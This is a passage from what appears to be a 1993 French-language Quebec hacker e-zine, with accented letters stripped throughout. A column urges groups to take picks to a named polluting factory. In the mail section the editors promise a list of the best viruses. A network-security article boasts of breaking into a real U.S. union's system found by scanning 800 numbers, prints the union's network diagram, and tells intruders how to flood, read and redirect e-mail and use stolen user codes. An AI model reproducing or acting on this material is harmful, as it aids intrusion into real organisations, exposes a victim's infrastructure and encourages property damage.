fermer sa gueule et sa ligne rouge. Pas assez vite toutefois. Della Noce
avait eu le temps de faire l'apologie de la dlation devant toutes les
camras du pays.
Sa brillante ide: une ligne rouge qui inviterait
dnoncer
anonymement son voisin, son mononcle, son beau-frre, ds lors qu'on les
souponnerait de frauder l'assurance-chmage.
"Ben quoi, qu'est-ce que vous avez contre a?" s'est tonn le dput
de Duvernay. "Je l'ai dj
fait moi, Je suis pas mort!" Tu ne risquais rien
monsieur le dput. La mdiocrit n'est pas mortelle. La lpre non plus.
La dlation n'est pas autre chose: une mdiocre lpre.
Doit-on dnoncer le voisin qui maltraite ses enfants? Peut-tre. Aprs
l'avoir averti qu'on allait le faire. Dnoncer le systme aussi, et ses
reprsentants chaque fois qu'ils abusent de leur pouvoir. Pour moi la liste
s'arrte l
.
Les voleurs, les trafiquants, les drogus, les vads, les
terroristes, les faux rfugis, les gens qui travaillent au noir, ceux qui
fraudent l'impt, ceux qui passant des trucs
la douane, ceux qui vont en
Floride avec leur assurance-chmage, compte jamais sur moi pour te le dire,
Della Noce.
Tu sais c'est quoi l'tat policier? Non, c'est pas quand la police est
au pouvoir. Ca c'est la dictature.
L'tat policier c'est quand une majorit de citoyens se rveillent le
matin avec une me de flic.
- 30 -
Malheureusement, plusieurs sysops de la rgion de Qubec ont une me de
flic... Ou alors se destineraient-ils
une carrire politique?
On aurait pu continuer ainsi les citations, et aller chercher Sir Winston
Churchill, par exemple, qui disait (
propos des collabos franais):
Les dlateurs "are the lowest lifeform known to man"
Et de par l'histoire, nous le savons tous, les dlateurs ont toujours
abond. Judas D'Iscariote lui-mme... Mais vous savez comment il a fini,
Judas...
Mais assez sur ce sujet, je crois que je vais vomir. On fera le point au
prochain numro...
Ceci dit, nous croyons qu'avec ce numro quatre, Northern Phun Co. vient
de trouver sa vitesse de croisire. On regarde devant nous, et l'azur est
radieux! On regarde derrire nous, et il n'y a que quelques cabots qui
s'acharnent encore
s'entre-dchirer pour les restes de la chrysalide...
Vous avez dj
vu le film de Francis Ford Coppola, LE PARRAIN? Mon bout
prfr, c'est quand le producteur se rveille un beau matin avec la tte
de son cheval prfr dans son lit! HaHaHa!
Stay with us, folks, 93 is gonna be a pretty good year!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
BELL, PARTENAIRE EN AFFAIRES
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
LE FRANC PARLER DU VIEUX MEDEE
LOGE DE LA SUBVERSION
par
MERLIN L'EMMERDEUR
Vous tes le symbole mme du bon et honnte citoyen.
Vous payez vos impts avant le trente avril, vous achetez des obligations
d'pargne, vous allez voter rgulirement
tous les cinq ans pour le moins
pire, vous dormez prudemment, vous avez fait laminer votre mdaille
d'obissance.
Vous tes un gentil citoyen!
Vous croyez
l'autorit, vous croyez
la loi et
l'ordre, vous croyez
que le pape est infaillible, vous croyez que Dieu est blanc et catholique,
vous croyez qu'au fond Robert Bourassa est indpendantiste et qu'il a une
paire de couilles entre les jambes, vous croyez que le cardinal Lger tait
plus saint que con, vous croyez que Joe Clark aurait mieux fait que John
Turner ou Brian Mulroney, vous croyez que Solange-Ca Pue-Rolland cessera
un jour de brailler comme une vache, vous croyez que Jeanne Sauv a t une
grrrrrande canadienne, vous croyez qu'Elizabeth II chie de l'encens et de
la myrrhe, vous croyez que le gentilhomme
la verge noire mrite 110 mille
dollars par anne, vous croyez que Jean Crtin est capable d'avoir une ide
(mme intelligente), vous croyez qu'Andr Arthur dit tout haut ce que tout
le monde pense tout bas, vous croyez que Baderne Powell et le baron de
Coubertin n'taient pas que vieux, snobs et cons, vous croyez que J.F.K.
tait un grand prsident (informez-vous), vous croyez que Saddam Hussein
est une plus grande vermine que George Bush, vous croyez que les centrales
nuclaires sont sres.
Vous tes un gentil citoyen.
Vous croyez qu'un nouveau gouvernement va changer les choses, vous croyez
que les femmes au pouvoir feront mieux que les machos, vous croyez qu'on
apprend
lire et
crire
l'cole, vous croyez que les mdecins
pratiquent la mdecine, que les avocats dfendent la veuve et l'orphelin,
vous croyez que Dieu a cr l'homme
son image et
sa ressemblance, vous
croyez que les faux cons sont des oiseaux en voie de disparition.
Vous tes un gentil citoyen.
Vous croyez que vous n'tes pas responsables de la situation mardique dans
laquelle on se retrouve tous. Nous y reviendrons, mais avant jetons un coup
d'oeil sur ladite situation. Il ne faut pas insulter impunment de la bonne
marde...
a) Les jeunes et les baleines se suicident. Les politiciens et les
snateurs ne se suicident pas.
B) Rien ne va plus dans le btiment, on manque de prisons.
C) La moiti de nos lacs sont morts, les autres sont
moiti morts.
D) Les usines ferment, les soupes populaires aussi.
E) La violence est partout, surtout au Tljournal,
l'cole et
la
maternelle.
F) Les rablires meurent, les grenouilles aussi, les blugas aussi, les
morues aussi, les truites aussi, les homards aussi, les crevettes
aussi, alouette.
G) Pour rpondre
la crise conomique, Robert Bourassa ouvre des
casinos.
H) Sur chaque dollar gagn, il reste 15 cents en rel pouvoir d'achat.
Or, un sac de peanuts cote 95 cents.
I) Nos vieilles ne tricotent plus, elles grattent des gratteux de Loto-
Qubec.
J) C'est le retour de la Prohibition et Claude Elliot Ness Ryan.
K) Pour refroidir les sans-abris, on coupe les arbres. Le fonctionnaire
responsable est toujours vivant.
L) L'alternative
Brian Mulroney est Jean Crtin.
M) On emprunte pour payer la dette nationale.
N) L'Irak doit se plier aux rsolutions de George ONU Bush. Isral n'est
pas tenu de se plier aux rsolutions de l'ONU.
O) On a ralis, depuis 1940, 3066 expriences nuclaires. On en fait
encore.
P) On qute pour construire des hpitaux pour enfants cancreux. Les
enfants cancreux meurent quand mme, on leur paye un voyage
Disneyland.
Q) Autrefois on naissait avec les gnes de ses parents. Aujourd'hui, on
nat avec la dette de ses parents ($70,000 dollars par tte).
R) Deux individus sur 10 sont chmeurs, on exporte des billots
Tawan,
on importe des cure-dents de Tawan.
S) On exporte des vieux et leur pension en Floride. On importe des
cancers de la peau de Floride.
T) Triomphe de la haute technologie: comment transformer un fleuve
majestueux et 688,000 km de rivires en fosse septique.
U) On change des panneaux "stop" en panneaux "arrt", on change des
panneaux "arrt" en panneaux "stop", on change des...
V) La couche d'ozone dcrisse, Ral Gigure anime Jeopardy.
W) Dieu dteste les tapettes, le juge Bienvenue aussi, le sida aussi,
seuls les tl-preachers peuvent gurir les sidatiques. Envoyez vos
dons
Billy...
X) On change les chmeurs en BS, on change les BS en chmeurs. On appelle
a: formation professionnelle, formation aux adultes, programme
SPRINT, etc.
Y) Depuis quarante ans, le taux de spermatozode par centilitre de sperme
a diminu de 50% (absolument vridique). Si la tendance se maintient,
Radio-Canada annonce la fin de l'homo stupiditus pour l'an de grce
2033.
Z) Superman est mort et Zorro s'est recycl dans la construction de
cabanons de jardin.
Voil
o on en est
Et pourtant vous avez toujours t un bon petit citoyen respectueux des
lois et de l'autorit lgitime.
Voil
pourquoi il faut de toute urgence dboulonner tous ces pas bons, tous
ces incapables, tous ces pitres, toutes ces andouilles et tous ces trou-du-
culs qui nous gouvernent.
Les tides diront que nous sommes tous coupables, qu'il ne faut pas
seulement blmer les politiciens, et qu'on a les lois qu'on mrite. Il y
a du vrai l
-dedans, mais commenons par le commencement. Flushons d'abord
les pas bons puisqu'ils n'ont pas la dcence de se flusher eux-mmes.
Les mmes tides diront encore qu'il faut agir dmocratiquement. Un peuple
qui a vot QUATRE FOIS pour Robert Bourassa ne fera jamais rien pour sauver
sa peau. C'est tout vu et class...
Voil
pourquoi il faut verser dans la subversion. Qu'il se lve, celui qui
a mieux
proposer!
----------
Comme d'habitude, je vous livre une petite anecdote avant de passer
au volet pratique de ce court expos.
Il y a quelques annes (deux ou trois), une grosse compagnie du genre Sears
ou Eaton a t condamne
une forte amende pour avoir escroqu sa
clientle quant
la qualit et
la nature des pierres (soi-disant)
prcieuses qu'elle leur vendait. Quoique pondu en novembre, le jugement ne
fut rendu public que le 15 janvier suivant. Vous savez pourquoi? Pour ne
pas nuire aux affaires de la compagnie pendant la trs lucrative priode
des Ftes. Moi, j'appelle a de la complicit aprs le fait. Les trs
honorables juges de la Cour Suprieure de l'Ontario dtiendraient-ils des
blocs d'actions votantes dans la compagnie? Cela s'appelle "conflit
d'intrt". Beaucoup de politiciens ont perdu leur job pour a, mais les
juges, dans ce systme, sont intouchables. Ils ont l'injure au tribunal
facile. Il n'y a rien de plus susceptible qu'un honorable juge. Par ici,
les juges rclament de faramineux salaires afin, disent-ils, d'chapper aux
influences INDSIRABLES (quelle lgance pour dfinir la corruption). Il
y a pourtant une autre faon de s'assurer de l'intgrit de juges: dans
l'ex-URSS, on pendait les juges corrompus. sauf, bien sr, s'il s'agissait
du gendre du secrtaire-gnral du PC, l'exception confirme la rgle...
Bref, revenons sur terre.
Aprs des annes d'efforts soutenus et ingrats, les mouvements cologiques
obtiennent de bien maigres rsultats. Greenpeace et cie veulent que l'on
cesse de tuer les baleines et les dauphins, ils veulent que l'on cesse de
jeter notre marde et notre plutonium dans les mers, ils veulent pargner
la dernire pinette noire du continent. Presss par l'opinion publique,
comme ils en ont l'habitude, les politicaillards rcuprrent la vague en
lui enlevant toute signification. Fbriles comme des soubrettes en manque,
ils dcrtent qu'il est dsormais interdit de fumer en dehors des fumoirs
autoriss et qu'il est obligatoire de tirer
bout portant sur les
contrevenants. Cinquante mille bonnes femmes occupant le poste de
directeure des ressources humaines (?) de toutes les entreprises du pays
partent en croisades, en guerres saintes. Ces pauvres types de Greenpeace
ne voulaient que sauver la plante...
Interdire la cigarette, c'est facile, a ne cote rien, et il n'est pas
ncessaire d'avoir des couilles au cul pour l'imposer. les lecteurs sont
contents et la compagnie Tioxide (de Tracy) peut continuer
jeter 120
tonnes mtriques d'acide dans le St-Laurent
tous les jours, 365 jours par
anne. Des blugas, a ne vote pas: ils se contentent de crever, ces
ingrats...
Il n'y a rien
faire, dites-vous!
Non, il y a toujours quelque chose
faire et il faut le faire mme s'il
tait trop tard. De grce, les mmes, ne soyez pas aussi cons que vos
vieux.
Voici, here is, mon plan (de ngre?). Il faut former une premire cellule
de dix personnes. On appelle Environnement Qubec qui nous apprend (?) que
le plus grand pollueur du coin est Daishowa, l'ex-Reed Paper, l'encore plus
ex-Anglo Pulp and Paper Co... On s'arrte chez le Rona de votre voisinage,
on achte chacun un pic et une pioche, on prend l'autobus et on se fait
dposer devant l'usine. Alors, on se met tranquillement
dmolir un coin
de l'difice. videment, on aura prvenu la presse auparavant. videment,
on aura mme pas le temps d'arracher deux briques avant l'arrive en force
des flics. On se laisse docilement arrter, tout le monde se dclare non-
coupable et tout le monde plaide la lgitime dfense, car il s'agit
vraiment de lgitime dfense: ces ordures nous empoisonnent l'eau et l'air.
Quelle est la diffrence avec le gars qui empoisonne sa belle-mre
petites doses d'arsenic?
Il faut prvoir qu'un gars sur la gang sera sur le B.S. C'est lui qui
embauchera un avocat et c'est l,aide juridique qui paiera l'avocat. Au
pire, chacun copera d'une amende et au mieux, il n'est pas exclu que nous
gagnions notre cause. Au besoin, nous ferons appel
la gnrosit des gens
lucides pour constituer un fond de dfense. Si Greenpeace peut rcolter 22
millions de dollars par anne, pourquoi n'en obtiendrions-nous pas deux ou
trois mille?
Mais voici le plus beau de l'histoire: la tactique ne peut russir que si
elle fait boule de neige, et que d'autres groupes de dix personnes
embarquent dans l'affaire, pour suivre nos traces le lendemain, et le
surlendemain, et le jour d'aprs.
Le risque est minime, il suffit d'un peu de courage et de quelques heures
de libre. Nous aurons l'oreille des mdias,
nous de faire notre pub et
de dclencher une raction en chane.
ATTENTION, nos pires ennemis dans cette affaire ne seront ni l'tat, ni la
grande industrie. Nos ennemis seront les travailleurs des usines cibles.
Il y a encore des gens qui n'ont pas compris que l'on peut gagner sa vie
sans en mourir. Ces gens-l
se battront pour leur steak sans raliser qu'
MOYEN terme, ils tuent aussi leur propre chiares...
Par contre, si l'opration russit, si une lgion d'coeurs se manifeste,
le systme judiciaire va vite se retrouver avec une masse de procs couteux
sur les bras: il leur faut
chaque fois faire une preuve pour ne rcolter
qu'une minable amende. La presse est sur les dents, le systme craque. La
charge est lourde, les tribunaux sont paralyss, le Trsor paie
la fois
pour la poursuite et la dfense. Comme lorsqu'il s'agit de dfendre la
cause des anglais devant la loi 101. Pour une fois, les politicaillards
ineptes devront bouger. Ils devront agir et vite. Il ne faut pas leur
laisser une seule seconde de rpit.
Ne croyez pas que les politicaillards de merde agiront sans se faire
pousser dans le cul. Conformment
la perception populaire, un politicien
c'est de la merde: si cela n'tait pas vrai, il y a longtemps qu'ils
auraient fait quelque chose. La plante agonise, l'conomie se crache les
poumons, les pauvres mangent leurs bas, seuls les politiciens trou-du-culs
s'enttent
ne rien voir.
Voil
pourquoi la subversion est ESSENTIELLE!
Comme le dit l'oncle Sam, en pointant son grand doigt pas trs propre, tout
juste sorti du cul de l'attorney gnral: Young men, la patrie a besoin de
vous,
Merlin L'Emmerdeur
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
BELL, DES GENS DE PAROLE
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
LE FACTEUR QUOTE TOUJOURS DEUX FOIS
Votre courrier
Encore une fois, cette semaine, nous ne publions que quelques lettres
parses, le corps des messages
NPC se retrouvant dans nos messageries
publiques, et donc accessible
tous. Cependant, certaines lettres
aboutissent tout de mme ici, soit pour la qualit de la prose et/ou pour
la pertinence ou l'impertinence des remarques. Si vous voulez tre publis
dans NPC -le mensuel-, dbrouillez-vous pour nous laisser quelque chose de
song!
La premire lettre nous a t envoye par, vous l'auriez devin en la
lisant, Mphisto.
------
Taxi! A la morgue, s.v.p
(Les extraits entre guillemets sont de l'auteur, THX 1138)
Ce texte, de THX 1138, dborde d'inepsies.
"... Northern Phun Co. ...cette ... gang de fous."
L'auteur, d'abord, traite l'quipe de Northern Phun Co. de gang de fous.
Schizophrne avanc, il en fait lui-mme partie.
"... tu essaies d'avoir le moins de contacts possible avec l'autre
ralit, celle qui t'attend sur le seuil de ta porte."
C'est la dfinition mme de cette maladie mentale, la schizophrnie.
Rien dans la suite de ce texte ne va donc me surprendre.
L'auteur se replie sur sa petite ralit mentale, le cyberspace, et
tout le reste n'existe plus.
Si les jeunes assassins du taxi s'taient adonns
la tlmatique,
ce meurtre n'aurait pas eu lieu. "Je gagerais mon modem qu'aucun de
ces 5 malfrats ne possde d'ordi et de modem." Donc, pour combattre
la criminalit juvnile, vive l'informatique. Quel rapport!
Tout le monde sait qu'avant l're informatique, cette criminalit
tait quasi inexistante.
Lisez la perle qui suit: "... la dissidence
lectronique, telle que prne par NPC, PROTEGE en ralit la population."
Si tous lisaient NPC, il n'y aurait plus de crimes...
Et encore: "...si ces comiques avaient lu NPC, il n'y aurait
pas eu cinq vies de gches..." Un seul pouvait le tuer!
Ce qui est inacceptable, mme chez les NPCiens, j'ose le croire, c'est que
dans toute la suite du texte, l'auteur argumente que c'est correct de tuer
un chauffeur de taxi. Ils sont tous fascistes. Ils haissent tout le monde:
les Arabes, les Indiens, les Juifs, les Israliens, les immigrants, les
jeunes, les femmes, les noirs, eux-mmes. Alors tuons les chauffeurs de
taxi. "Dlivrons-les de leurs souffrances."
L'auteur avoue qu'il est terroris par la haine des chauffeurs de taxi.
Et c'est la faute
Andr Arthur.
Ce n'est pas la faute
Andr Arthur.
Tout ce que tu as racont n'existe que dans ton pauvre cerveau.
Tu souffres de schizophrnie. S'il n'y avait que a!
Tu es possd par la haine des adultes. Un malade de ton espce souffre de
tout ce qui reprsente le pre. La peur du pre, la haine du pre.
Tu n'as pas encore rgler ton complexe d'Oedipe. Pour la plupart des
jeunes, "... la pubert suffit gnralement
les remettre dans le droit
chemin..." Pour toi, a n'a pas suffit.
Je ne demande qu'une chose: NPCiens, dans votre no 4, ne publiez pas les
crits d'un malade mental.
-------------------
Blitzkreig rpond:
T'as bien raison, Raoul. Nous n'avons que faire de la prsence d'un
psychopathe dans nos rangs. Mental Floss et moi l'avons coinc au
tlphone, et lui avons dit notre manire de penser. Il est au courant que
ce numro de NPC est consacr aux bonnes actions qui peuvent tre poses
par les H/P, et il nous a promis de nous crire quelque chose en ce sens-
l
...
----------------------------
SECTION : Northern Phun Co., #1530 (PRIVEE)
DATE : 19/02/93 19:52 (RECU LE 20/02/93 17:41)
DE : M. B.
A : Blitzkreig
SUJET : $$$$
Pourquoi pas ecrire sur: Tous les moyens de se servir de son ordi a des fin
monetaires$$$
Vaut-il la peine de caller LD
Un 14.4...ou un 300
Backdoor
Un autre virus mais en assembleur
Meilleurs virus disponibles sur le marche!
........
-----------------------
Blitz rpond:
Pour les virus, on a Jack Damme qui s'en vient de Montral ds le prochain
numro (un ex de NukE, je crois). Pour les moyens de faire des sous avec
les ordis... Le profit n'est pas notre principal motivateur... Vaut-il la
peine de caller LD: c'est srieux, cette question? Les backdoors: il y a
bien d'autre chose
faire dans le HP que de trasher des boards, si tu veux
mon avis. Une liste des meilleurs virus sur le march: Ca c'est une BONNE
ide! On s'y met ds le prochain numro!
C'est dj
tout pour le courrier... on va pas gonfler inutilement le mag
avec des messages ;-)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
MERCI D'UTILISER L'INTERURBAIN BELL
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
A LA QUEUE LEU-LEU
LA SCURIT DES RSEAUX
par
Blitzkreig
Que vous les appeliez LAN (Local Area Network), rseaux, ou OSI (Open
System Interconnection), c'est du pareil au mme. Les rseaux, c'est la
faon qu'ont trouv les compagnies pour grer le travail de leurs employs,
pour faciliter la communication entre les diffrents services (E-mail),
pour maximiser le rendement de l'investissement en quipement informatique,
et pour uniformiser les mthodes de travail. Les rseaux se construisent
avec du hardware (les connecteurs Ethernet, par exemple), et avec du
software, que ce soit Novell ou Lantastic. Ce dernier soft, Lantastic, est
d'ailleurs le favori des hackers qui ont soif de systmes, car les files
contenant les mots de passe des usagers ainsi que leurs codes d'accs sont
plus facilement accessibles que sur n'importe quel autre logiciel. Les
rseaux maillent la vie du praticien du H/P, car tu les retrouves partout:
l'cole,
l'entreprise, dans la plupart des systmes gouvernementaux,
bref, ils sont incontournables.
Dernirement, l'un d'entre nous
dgot, en scannant les 800 pour les
carriers, un systme bas
Washington. L'entreprise s'appelait la UNITED
FOOD AND COMMERCIAL WORKERS UNION. On a dnich dans leur banque de donnes
le diagramme de l'installation de leur rseau. Nous vous le prsentons ici
titre d'exemple, afin que vous vous fassiez une ide prcise du
fonctionnement d'un rseau-modle au sein d'une entreprise.
Exemple d'tage - 7 au 9 plancher
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºPrinter Workstation Netport º
º ±±±±ÄÄÄÄÄÄÄÛÛÛÛÛÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÛÛÛÛÛÄÄIJ²²² º
º Workstation ³ ³ Shared º
º ÛÛÛÛÛÄÄÄÄÄÄÄÄÄÄÄÄÄ¿³ ³ Printer º
º Workstation ÚÁÁÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄ¿ º
º ±±±±ÄÄÄÄÄÄÄÛÛÛÛÛÄÄÄÄÄÄÄÄÄÄÄÄ´ RJ45 Patch ³ º
ºShared ³ Panel Rack Mount³ º
ºPrinter ÚÄ°°°°ÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÂÂÂÄÄÄÄÄÄÄÙ º
º ³ Xircom ³³³ º
ºLaptop ±±±²²± Concentrator ²²²²² º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍØÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Headquarters ³
Gateway ³ ±Voice
Server ³ ³ 4 lignes
±±±±±±±±± Concentrator ²²²²² ³
±±±±±±±±±ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³³³ ³
³ ³³³ ³
³ 5 ³³³ ³
Communications³ NetWare ³³³ Û Fax
Voice Modems servers ³ servers ³³³ Û Server
°ÄÄÄÄÄÄÛÄÄÄÄÄÄÄÄÄÄı±± ³ ±±± ³³³ ³
±±± ³ ±±± ³³³ ³
°ÄÄÄÄÄÄÛÄÄÄÄÄÄÄÄÄÄı±± ³ ±±± ³³³ ³
±±± ³ ±±± ÚÄÁÁÁÄÂÄÙ
°ÄÄÄÄÄÄÛÄÄÄÄÄÄÄÄÄÄı±± ³ ÀÄÄÄ´ RJ45³ Facility management
³ ÀÄÄÄÄÄÄÄ´PANEL³ Workstation
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄ°°°°
ÀÂÄÄÂÄÙ °°°°
±±±±±±ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³
±±±±±±ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÛÛÛ T-1 ³ ÛÛ Tape
Gateway ³ ³ Backup
server ³ ÜÜÛÛÛÛÛÜÜ
³ Network Administration
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Workstation
³
ÉÍÍØÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º ³ Alexandria Data º
º ÛÛÛ T-1 Center º
º ³ ±±±±±± º
º ÀÄÄÄÄÄÄÄIJ²²²ÄÄÄÄÄÄÄı±±±±± º
º Host LAN Unisys A-11 º
º Connection º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Nous avons eu de la chance de tomber sur ce syndicat, car le fait
qu'ils ngocient des conventions collectives
travers les USA
explique qu'il y avait trois nodes
leurs bureaux centraux. C'est
par l
que nous sommes rentrs <grin>.
Mais assez parl des rseaux, car je vous connat, bande d'obsds:
vous dsirez tout simplement savoir comment les hacker! Pour ce
faire, mettez-vous cinq minutes dans la peau d'un oprateur, d'un
sysadmin, responsable d'un rseau de grande envergure. Vous avez
entre les mains une belle bte que le moindre microbe peut
terrasser. Apprenez d'abord
identifier vos ennemis... pour
connatre vos vulnrabilits. Vous ne voulez pas EMPECHER les gens
d'accder au systme, bien au contraire. Sauf que ces usagers
doivent obir strictement au protocole d'accs que vous avez
instaur.
Si votre systme n'est connect sur aucune ligne tlphonique
accessible de l'intrieur (comme plusieurs banques, les industries
de la dfense, etc), les possibilits de dfaillance sont
restreintes. Bris des composantes, pannes d'alimentation et
employs fraudeurs sont vos seuls ennemis. On s'assure d'avoir des
systmes de backup et du hardware fiable pour contrecarrer les
effets de l'un, et on protge PHYSIQUEMENT l'accs aux terminaux
en enregistrant les usagers pour l'autre.
Si, par contre, on peut communiquer avec votre systme de
l'extrieur, vous venez de vous compliquer la vie...
La premire chose qu'un sysadmin va faire, tout comme le sysop de
n'importe lequel BBS qui se respecte, c'est de ne JAMAIS donner
un utilisateur plus d'accs qu'il n'en a besoin. Si la hirarchie
de votre politique d'accs exige que M. Untel puisse utiliser
exclusivement le traitement de textes et le chiffrier, vous ne lui
laisserez pas un accs superuser... C'est simple, non? Ce mme
accs de superuser, gnralement reli aux sysadmins, doit lui
aussi tre protg de manire
ce que les petits curieux ne
puissent pas avoir accs aux commandes de configuration du rseau.
Une autre vrit qui relve de l'vidence, mais qui est parfois
oublie...
Nous reviendrons plus tard aux mthodes de protection gnralement
utilises par les sysadmins qui ont du beat, mais revenons
la
case dpart, c'est
dire
l'identification des problmes qui
peuvent subvenir sur un rseau, et qui n'impliquent pas le
hardware, le software ou l'alimentation. Il est bien entendu qu'une
attaque sur un rseau peut impliquer un mlange savamment dos de
plusieurs de ces mthodes... Mettons de l'ordre dans nos ides...
1) Blocage d'accs: cette forme d'attaque se produit quand un
utilisateur, en rgle ou non, empche un ou plusieurs autres
utilisateurs du systme d'utiliser de manire fonctionnelle leur
accs. Tous intrus sur un systme quip de E-mail, de poste
lectronique, devrait chercher de ce ct les moyens de, non
seulement lire le courrier des autres et le rediriger, mais de
s'arranger pour "emballer" la machine afin que le E-Mail soit
produit de faon continue, engorgeant trs rapidement les systmes
avec des units de sauvegarde rduites, ce qui aura pour effet de
barrer le systme.
2) L'imposteur: Ciel, c'est nous,
! Ben, a s'explique vachement
bien, non? Tu as trouv le code d'un usager en rgle, et tu
pntres le rseau avec son accs...
3) Modification des messages: peut tre ralis par un intrus ou,
ce qui arrive gnralement dans la plupart des cas, par un usager
en rgle. Le dernier mmo du service des dplacements disait:
"Versez $ 800
Paul Paroix pour son voyage, et dbitez le compte
de Paul Paroix". Quelle ne serait pas la surprise de ce cher Paul
si le message, aprs manipulation, disait: "Versez $ 800
Pierre
Caheut pour son voyage, et dbitez le compte de Paul Paroix".
4) La trappe
souris: Une "trapdoor", comme on dit gnralement en
